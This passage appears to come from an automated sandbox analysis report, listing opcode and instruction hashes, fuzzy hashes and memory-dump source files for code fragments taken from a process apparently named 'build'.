                                                                                                                                            • Opcode ID: 3b9bb8c0e203431583fe80fa8a90357c065a4398871be31c3851ae98fb001a0e
                                                                                                                                            • Instruction ID: 3622dac38ee7182a95e3fd4ee66e6bf6b40e877d6dd2d3fdcb8d0c3bf01b72e7
                                                                                                                                            • Opcode Fuzzy Hash: 3b9bb8c0e203431583fe80fa8a90357c065a4398871be31c3851ae98fb001a0e
                                                                                                                                            • Instruction Fuzzy Hash: 6731C670919A19CFEBA5EF28C855AA8B3F1FF5A304F5085E9D04DD3255CF34AA858F80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f5c8a6b3df2e8e789050a328a2262e6613d80bfa00e681fddb378de988a08d76
                                                                                                                                            • Instruction ID: ef0b4a2aadaec2951df0fab9a5af1e17a79b10909284188eb25395aa066b51f0
                                                                                                                                            • Opcode Fuzzy Hash: f5c8a6b3df2e8e789050a328a2262e6613d80bfa00e681fddb378de988a08d76
                                                                                                                                            • Instruction Fuzzy Hash: B4F0E270D19A28CEDBA4DF189840AECB3B1FB5A304F4045A9C10DE7251CB34AA848B84
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 44a280cedd58fca11f1ca2a81968ca2615dc75dce5f95912bb897705066a607a
                                                                                                                                            • Instruction ID: e21cdd620ee8d48af74c1a1b1ea1b1786c4b0f2fed9d832bcaf9b3f42cf50a29
                                                                                                                                            • Opcode Fuzzy Hash: 44a280cedd58fca11f1ca2a81968ca2615dc75dce5f95912bb897705066a607a
                                                                                                                                            • Instruction Fuzzy Hash: 9BF0A470D0AA1DCEEBA4DF189441AECB3B1FB5A304F4055E9D10DE7241CB34AA848F84
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2307079681.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ffaacce0000_build.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4079c5e203098f3f8acf23d2c9093f770adbc9ec21d7393440733d09f885c18c
                                                                                                                                            • Instruction ID: 93e0794c9d30c45f0555b2453afc3614be2678d3edda374f0fad96b22192e1a9
                                                                                                                                            • Opcode Fuzzy Hash: 4079c5e203098f3f8acf23d2c9093f770adbc9ec21d7393440733d09f885c18c
                                                                                                                                            • Instruction Fuzzy Hash: 97F0A470D09A1CCEDBA4DF18D440AECB3B1FB56304F4055E9C10DE3251CB359A848F44